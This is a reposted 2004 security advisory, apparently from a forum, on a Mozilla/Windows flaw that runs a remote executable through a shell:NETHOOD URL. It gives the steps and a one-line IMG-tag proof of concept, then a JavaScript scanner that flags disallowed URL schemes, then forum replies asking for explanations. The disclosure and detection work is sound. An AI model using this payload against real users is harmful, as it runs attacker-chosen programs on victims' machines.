
Shell code for remotely running an executable program

[START] Advisory

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"

At last, make MOZILLA request the following URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A file named "fileid.exe" in the "shared" folder will be executed.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS supports "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his original discovery.

######################### [START] PROOF OF CONCEPT #######################
[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]

Source: http://666w.com/art/568.htm

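A defensive check for the issue in the advisory above, as an added example that is not part of the original post or the advisory: it scans untrusted markup for URL attributes (such as the IMG SRC in the proof of concept) whose scheme is outside an allowlist. The allowlist contents and the function names are assumptions made for illustration.

```javascript
// Added example, not code from the advisory or from Mozilla.
// Assumed policy: only these URL schemes may appear in untrusted markup.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Turn a numeric character reference into its character (U+FFFD if invalid).
const fromCode = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");

// Decode character references so that "sh&#101;ll:" is seen as "shell:".
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)))
    .replace(/&colon;/gi, ":");
}

// Return the lower-cased scheme of a URL attribute value, or null when the
// value is relative. Browsers ignore leading control characters and spaces and
// drop tab/CR/LF inside a URL, so the same normalisation is applied first.
function urlScheme(raw) {
  const v = decodeEntities(raw)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+/, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;
}

// Scan markup for URL-bearing attributes whose scheme is not allowlisted.
// Tags opened with "[" are accepted too, because the proof of concept above is
// written that way. Regex scanning is enough for triage; a sanitizer that
// rewrites markup should use a real HTML parser.
function findDisallowedUrls(html) {
  const TAG_RE = /[<\[]\s*([a-z][a-z0-9]*)\b([^<>\[\]]*)[>\]]/gi;
  const ATTR_RE =
    /\b(src|href|data|action|background)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"']+))/gi;
  const hits = [];
  for (const tag of html.matchAll(TAG_RE)) {
    for (const a of tag[2].matchAll(ATTR_RE)) {
      const value = a[2] ?? a[3] ?? a[4];
      const scheme = urlScheme(value);
      if (scheme !== null && !ALLOWED_SCHEMES.has(scheme)) {
        hits.push({ tag: tag[1].toLowerCase(), attr: a[1].toLowerCase(), scheme });
      }
    }
  }
  return hits;
}
```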


I never studied assembly. 鹦鹉 is so good that I want to become your apprentice...


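Visit the shared folder named shared on the server X-6487ohu4s6x0p, which creates a shortcut named shared on X-6487ohu4s6x0p in the shell:NETHOOD folder. Finally, make MOZILLA request shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe, and the file fileid.exe in the shared folder will be executed. When a valid shell protocol is handled as in http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html, MOZILLA will execute a file. Windows supports shell:NETHOOD.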


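Supporting this. I hope 鹦鹉 can explain it in detail, I don't understand it. I spent half the afternoon today looking at assembly and my head is spinning. Sigh, I didn't learn it properly back then. If my teacher had told me earlier that assembly could be used as a hacking tool, I think I could have been like 鹦鹉 too. Starting today, I'm learning from 鹦鹉~~~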


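OK
I have to log off for today
I'll explain it tomorrow :)
I think we should read more articles on low-level programming
What do you think?
If you agree
I'll post more on this topic in the future :)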


I didn't understand it. Could 鹦鹉 explain it a bit...
